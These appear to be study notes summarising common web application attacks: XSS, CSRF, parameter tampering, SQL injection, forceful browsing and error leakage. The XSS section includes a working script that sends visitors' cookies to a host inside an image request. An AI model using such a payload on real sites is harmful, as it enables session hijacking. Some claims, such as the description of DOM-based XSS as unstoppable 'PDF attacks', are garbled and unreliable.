- Ability to make user-agent (e.g browser) to run hacker scripts while in the context of the hacked application. 3-types of cross-site scripting attacks: Stored: bulletin board manipulation attack a bulletin board or auction posting, where users can submit comments to be viewed by others. Malicious Javascript can be submitted instead of plain text. E.g user can fill out an auction for an item and include the following script in the bottom of the description <script language = javascript> document.write (<img src=http://localhost/?url= + document.location + &cookie= + document.cookie + >); </script> The above script inserts html into the page which looks like regular html tag, but includes current users cookie value on image request. Any other user using viewing this img will send cookie info to the webserver as in the script. Now the hacker can use the cookie info to iimpersonate them on various sites. Reflected: used in conjunction with phishing Stored and reflected attacks can be stopped by making sure application doesnt echo back info received from user. DOM-based: are PDF attacks cannot be stopped because as they are not controlled by the application. 3.1.6: Cross Site Request Forgery (CSRF) Forces a logged-on victims browser to send a request to a vulnerable web application, which then performs chosen action on behalf of the victim. Application with following characterstics are at risk -
Has no authorization chcks for vulnerable actions
Processes an action if default login is given the request Authorizes requests based on only credentials that are automatically submitted such s session cookie, if currently logged into web application
CSRF work work because users authorization credential is automatically included in
the requests by browsers, though the attacker simply didnt supply that credential. 3.1.7: 3rd party misconfiguration - companies partner with 3rd party products - as part of business model, access must be granted to sensitive data. Without security attention to this data, organizations are at risk. - e.g attacker can create files on server if NFS permissions are given. 3.1.8: Parameter Tampering
- involves manipulation of URL parameters to retrieve info which is otherwise not
available to user. - e.g changing URI to retrieve more info than expected. - others include, form fields, internal modules, attribute parameters, which categorize the behavior of the application. - tamper cookies, HTTP headers , query strings - secure cookies can be modified by client. Form fields can be changed. 3.1.9: SQL Injection - exploits knowledge or educated guesses about server-side technology driving the application - attacker inserts sql commands into form intead of legitimate data. - attaker finds a parameter that application passes to database, embeds malicious sql commands into the content of parameter and tricks web app to forward query to db - this can cause access, corrupt, damage to the db. - shell commands also produce injection attacks and needs to be carefully scrubbed when passed from http request. 3.1.10: Forceful browsing - directly accessing a page that should not be shown to a user or which is not a link for public access. - editing url in browser to gain access to files that are not intended to be public. - eg. Skipping login & registration pages to get to pages behind it. 3.1.11: Improper error handling - detailed internal error messages are revealed. - such as db dumps, stack traces.